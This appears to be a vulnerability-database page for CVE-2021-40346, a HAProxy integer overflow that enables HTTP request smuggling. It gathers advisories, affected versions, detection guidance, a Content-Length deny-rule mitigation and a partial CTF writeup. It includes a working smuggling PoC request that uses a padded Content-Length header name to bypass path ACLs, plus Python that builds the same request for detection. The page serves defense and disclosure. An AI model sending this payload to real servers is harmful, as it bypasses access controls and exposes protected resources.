CVE-2021-40346
Published: 2021-09-08
Priority: P2 · 61 · high · CVSS 3.1 base score 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
EPSS: 56.08% (98.9th percentile)
An integer overflow in htx_add_header() in HAProxy 2.0 through 2.5 can be exploited to perform an HTTP request smuggling attack, allowing an attacker to bypass all configured http-request ACLs and possibly other ACLs. The HTX header block stores the header-name length in an 8-bit field, and the vulnerable versions add a header without checking that the name fits: a name of 256 + 14 bytes is stored as a 14-byte name followed by a one-byte value, so a padded `Content-Length0aaa…` name is read back as `Content-Length: 0`, and HAProxy ends up carrying a second Content-Length header that its parser never validated (CWE-190 integer overflow leading to CWE-444 request smuggling). Fixed in 2.0.25, 2.2.17, 2.3.14 and 2.4.4; see the affected table.
Affected versions

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | haproxy | < 2.2.16-3 (bookworm) | 2.2.16-3 (bookworm) |
| fedoraproject | fedora | — | — |
| haproxy | haproxy | — | — |
| haproxy | haproxy | >= 0 < 2.2.9-2+deb11u2 (Debian bullseye package) | 2.2.9-2+deb11u2 |
| haproxy | haproxy | >= 0 < 2.2.16-3 (Debian package) | 2.2.16-3 |
| haproxy | haproxy | >= 2.0.0 < 2.0.25 | 2.0.25 |
| haproxy | haproxy | >= 2.2.0 < 2.2.17 | 2.2.17 |
| haproxy | haproxy | >= 2.3.0 < 2.3.14 | 2.3.14 |
| haproxy | haproxy | >= 2.4.0 < 2.4.4 | 2.4.4 |
Detection & IOCs

PoC request from the Door (un)Locked CTF writeup below (the padded header name is reproduced as indexed; an ordinary second Content-Length header follows it):

```
POST / HTTP/1.1
Host: door-unlocked.chal.intentsummit.org:8000
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 22

GET /flag HTTP/1.1
h:GET / HTTP/1.1
Host: door-unlocked.chal.intentsummit.org:8000
```

The 22-byte body is `GET /flag HTTP/1.1` plus CRLF plus `h:` (20 + 2 bytes); that is what HAProxy, sizing the body from the genuine Content-Length, forwards as the POST body after the path ACLs have approved `POST /`. A backend that instead trusts the forged `Content-Length: 0` reads those bytes as the start of a new request, and the `h:` prefix swallows the following request line as a header, so `/flag` reaches the backend without ever being matched against HAProxy's path ACLs. Note that only one header on the wire is literally named Content-Length; the duplicate exists in HAProxy's parsed (HTX) view after the overflow, which is why a header-count rule inside HAProxy catches it while a sensor in front of HAProxy has to key on the oversized header name.

- Detect duplicate Content-Length headers in HTTP requests or responses; the exploit relies on a second Content-Length header appearing in HAProxy's parsed request.
- The attack vector is an oversized, padded Content-Length header name ('Content-Length' followed by hundreds of 'a' characters and a colon) that triggers the integer overflow in htx_add_header, causing HAProxy to accept a second Content-Length and smuggle a request.
- The vulnerable function is htx_add_header in HAProxy 2.0 through 2.5; monitor for header names longer than 255 bytes, the bound the fix enforces.
- The root cause is incorrect handling of HTTP header-name length encoding; abnormally long header names in HTTP requests are the detection signal.
- Mitigation: add HAProxy ACL rules that deny requests and responses carrying more than one Content-Length header.
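As an added example (not HAProxy's code and not part of the CTF writeup), the following Python emulates the HTX header-block length packing that the fix commit referenced on this page (3b69886f) bounds-checks, and runs a wire-level inspection over a request constructed to mirror the PoC shape above. The bit widths (8-bit name length, 20-bit value length) are those of HAProxy's HTX block info word; the host `backend.example`, the request bytes and all function names are constructed for this example.

```python
"""Added example for CVE-2021-40346: not HAProxy's code, not the CTF writeup's.

1. htx_view_unpatched / htx_view_patched emulate how an HTX header block packs
   the name and value lengths into one info word (8-bit name length, 20-bit
   value length) and how the block is read back; the patched variant adds the
   bound check the fix introduced.
2. inspect_request parses a raw HTTP/1.1 request and reports the signals a
   sensor in front of HAProxy can see on the wire.
3. split_by_content_length shows the two body boundaries that cause the desync.
All request bytes below are constructed for this example.
"""

HTX_NAME_BITS = 8
HTX_VALUE_BITS = 20
HTX_NAME_MAX = (1 << HTX_NAME_BITS) - 1      # 255: the bound the fix enforces
HTX_VALUE_MAX = (1 << HTX_VALUE_BITS) - 1    # 1048575
FRAMING_HEADERS = {b"content-length", b"transfer-encoding"}


def htx_view_unpatched(name, value):
    """Vulnerable packing: info += (vlen << 8) + nlen with no range check.
    The block payload is name||value; read it back with the truncated fields."""
    payload = name + value
    info = (len(value) << HTX_NAME_BITS) + len(name)
    nlen = info & HTX_NAME_MAX
    vlen = (info >> HTX_NAME_BITS) & HTX_VALUE_MAX
    return payload[:nlen], payload[nlen:nlen + vlen]


def htx_view_patched(name, value):
    """Fixed behaviour: refuse a header whose lengths do not fit the fields."""
    if len(name) > HTX_NAME_MAX or len(value) > HTX_VALUE_MAX:
        return None
    return htx_view_unpatched(name, value)


def parse_request(raw):
    """Minimal HTTP/1.1 head parser -> (request_line, [(name, value)], body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request head")
    request_line, *lines = head.split(b"\r\n")
    headers = []
    for line in lines:
        name, colon, value = line.partition(b":")
        if not colon:
            raise ValueError("malformed header line: %r" % line[:40])
        headers.append((name, value.strip()))   # name kept byte-for-byte
    return request_line, headers, body


def inspect_request(raw):
    """Wire-level signals for CVE-2021-40346 in front of HAProxy."""
    _, headers, _ = parse_request(raw)
    literal_cl = sum(1 for n, _ in headers if n.lower() == b"content-length")
    oversized = []
    for name, value in headers:
        if len(name) > HTX_NAME_MAX:
            seen_name, seen_value = htx_view_unpatched(name, value)
            oversized.append({
                "wire_name_len": len(name),
                "htx_sees": (seen_name, seen_value),
                "forges_framing_header": seen_name.lower() in FRAMING_HEADERS,
            })
    # What a vulnerable HAProxy ends up holding after htx_add_header().
    htx_cl = sum(1 for n, v in headers
                 if htx_view_unpatched(n, v)[0].lower() == b"content-length")
    return {
        "literal_content_length_headers": literal_cl,
        "content_length_headers_after_htx": htx_cl,
        "oversized_names": oversized,
        "suspicious": bool(oversized) or literal_cl > 1,
    }


def split_by_content_length(raw, content_length):
    """(body of the first message, bytes left over for the next request) as
    seen by a party that believes the body is content_length bytes long."""
    _, _, rest = raw.partition(b"\r\n\r\n")
    return rest[:content_length], rest[content_length:]


# Constructed to mirror the PoC shape: 270-byte name (256 + 14), empty value.
PADDED_NAME = b"Content-Length0" + b"a" * 255
SMUGGLED = b"GET /flag HTTP/1.1\r\nh:"        # 22 bytes, as in the PoC
FOLLOW_UP = b"GET / HTTP/1.1\r\nHost: backend.example\r\n\r\n"   # host is hypothetical
POC = (b"POST / HTTP/1.1\r\nHost: backend.example\r\n"
       + PADDED_NAME + b":\r\n"
       + b"Content-Length: %d\r\n\r\n" % len(SMUGGLED)
       + SMUGGLED + FOLLOW_UP)
BENIGN = b"GET / HTTP/1.1\r\nHost: backend.example\r\nContent-Length: 0\r\n\r\n"

if __name__ == "__main__":
    report = inspect_request(POC)
    print("HTX reads the padded header as:", report["oversized_names"][0]["htx_sees"])
    print("Content-Length headers on the wire / after HTX: %d / %d"
          % (report["literal_content_length_headers"],
             report["content_length_headers_after_htx"]))
    print("next request if the body is 22 bytes:", split_by_content_length(POC, 22)[1][:14])
    print("next request if the body is 0 bytes: ", split_by_content_length(POC, 0)[1][:18])
    print("patched htx_add_header accepts it:", htx_view_patched(PADDED_NAME, b"") is not None)
```

Running it shows the padded 270-byte name read back as `Content-Length: 0`, one literal Content-Length on the wire versus two after HTX, and the two incompatible body boundaries (22 bytes for HAProxy, 0 for a backend that trusts the forged header) that produce the desync; the patched variant refuses the header outright. `split_by_content_length` is the piece to reuse when showing a backend team exactly which bytes become the smuggled request.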
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N |
| nvd | 2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:P/A:N |
| osv | — | 7.5 | HIGH | — |
| vendor_debian | — | 7.5 | HIGH | — |
| vendor_redhat | — | 7.5 | HIGH | — |
GHSA
GHSA-jwmg-q4wv-f75h (ghsa_unreviewed · 2022-05-24 · HIGH · CWE-190)
An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header() that can be exploited to perform an HTTP request smuggling attack, allowing an attacker to bypass all configured http-request HAProxy ACLs and possibly other ACLs.
OSV
CVE-2021-40346 (osv · 2021-09-08 · CVSS 7.5 · HIGH)
Description identical to the NVD text above.
Red Hat
haproxy: request smuggling attack or response splitting via duplicate content-length header (vendor_redhat · 2021-09-08 · CVSS 7.5 · HIGH · CWE-444)
Description identical to the NVD text above.
Proxy server haproxy has a flaw that could allow an HTTP request smuggling attack with the goal of bypassing access-control list rules defined by haproxy. The attack is made possible by an integer overflow that lets a request drive haproxy into an unexpected state while it is being parsed. The highest threat from this vulnerability is to integrity.
Mitigation: To mitigate this problem the following can be added to proxy config:
http-request
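The advisory's rule text is cut off above. As an added example (not the advisory's verbatim text and not the CTF's file), here is the mitigation it describes, applied to the frontend from the ha.cfg in the CTF writeup below and written from HAProxy's documented req.hdr_cnt and res.hdr_cnt sample fetches:

```haproxy
# Added example: the CTF's "frontend web" with the duplicate-Content-Length
# mitigation. Rule text is mine, built on HAProxy's req.hdr_cnt / res.hdr_cnt.
frontend web
    bind *:8000
    # Counted on the parsed (HTX) request, where the overflowed header already
    # reads as a second Content-Length, so the count is 2 for the PoC request.
    http-request  deny if { req.hdr_cnt(content-length) gt 1 }
    # Same check on the response path (response splitting via the same flaw).
    http-response deny if { res.hdr_cnt(content-length) gt 1 }
    # The original path rules stay; they were bypassed only because the
    # smuggled request never passed through them.
    http-request deny if { path_beg /flag }
    http-request deny if { path,url_dec -m reg ^.*/?flag/?.*$ }
    default_backend websrvs

backend websrvs
    http-reuse always
    server srv1 flask:5000
```

Place the hdr_cnt rule before any other http-request rule so it is evaluated first. This is a stop-gap; the fix is a release from the affected table (2.0.25, 2.2.17, 2.3.14, 2.4.4). Compliant clients send at most one Content-Length, so the deny rule is low-risk, but watch the frontend's deny counters for any legacy client that repeats the header.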
Ubuntu
HAProxy vulnerabilities (vendor_ubuntu · 2021-09-08)
Summary: HAProxy could be made to expose sensitive information over the network.
Ori Hollander discovered that HAProxy incorrectly handled HTTP header name length encoding. A remote attacker could possibly use this issue to inject a duplicate content-length header and perform request smuggling attacks.
Instructions: In general, a standard system update will make all the necessary changes.
Debian
CVE-2021-40346: haproxy (vendor_debian · 2021 · CVSS 7.5 · HIGH)
Description identical to the NVD text above.
Scope: local
bookworm: resolved (fixed in 2.2.16-3)
bullseye: resolved (fixed in 2.2.9-2+deb11u2)
forky: resolved (fixed in 2.2.16-3)
sid: resolved (fixed in 2.2.16-3)
trixie: resolved (fixed in 2.2.16-3)
No detection rules found.
No public exploits indexed.
arXiv
Securing an Application Layer Gateway: An Industrial Case Study (arxiv_fulltext · 2024-01-11)
Carmine Cesarano, Roberto Natella
Università degli Studi di Napoli Federico II, Italy
{carmine.cesarano2, roberto.natella}@unina.it
## Abstract
Application Layer Gateways (ALGs) play a crucial role in securing critical systems, including railways, industrial automation, and defense applications, by segmenting networks at different levels of criticality. However, they require rigorous security testing to prevent software vulnerabilities, not only at the network level but also at the application layer (e.g., deep traffic inspection components). This paper presents a vulnerability-driven methodology for the comprehensive security testing of ALGs. We present the methodology in the context of an industrial case study in the
CTF
2021_IntentCTF / Door_(un)Locked (ctf_writeups · 2021 · CVSS 7.5 · HIGH)
# Door (un)Locked
* Category: Web
* 100 Points
* Solved by the JCTF Team
## Description
> Some researchers started deploying a website for their CTF, but something went wrong with the defined policies when trying to hide the flags.
> Can you find the weak link?
The following file was attached (`ha.cfg`):
```
global
daemon
defaults
mode http
timeout client 50000
timeout server 50000
timeout connect 50000
frontend web
bind *:8000
http-request deny if { path_beg /flag }
http-request deny if { path,url_dec -m reg ^.*/?flag/?.*$ }
default_backend websrvs
backend websrvs
http-reuse always
server srv1 flask:5000
```
## Solution
The attached website contains nothing interesting:
```console
┌──(user@kali)-[/media/sf_CTFs/intent/Door_(un)Locked]
└─$ curl -s http://door-unlocked.chal.intentsum
```

References
- https://git.haproxy.org/?p=haproxy.git
- https://github.com/haproxy/haproxy/commit/3b69886f7dcc3cfb3d166309018e6cfec9ce2c95
- https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/
- https://lists.apache.org/thread.html/r284567dd7523f5823e2ce995f787ccd37b1cc4108779c50a97c79120%40%3Cdev.cloudstack.apache.org%3E
- https://lists.apache.org/thread.html/r8a58fd7a29808e5d27ee56877745e58dc4bb041b9af94601554e2a5a%40%3Cdev.cloudstack.apache.org%3E
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/A7V2IYO22LWVBGUNZWVKNTMDV4KINLFO/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MXTSBY2TEAXWZVFQM3CXHJFRONX7PEMN/
- https://www.debian.org/security/2021/dsa-4968
- https://www.mail-archive.com/haproxy%40formilux.org
- https://www.mail-archive.com/haproxy%40formilux.org/msg41114.html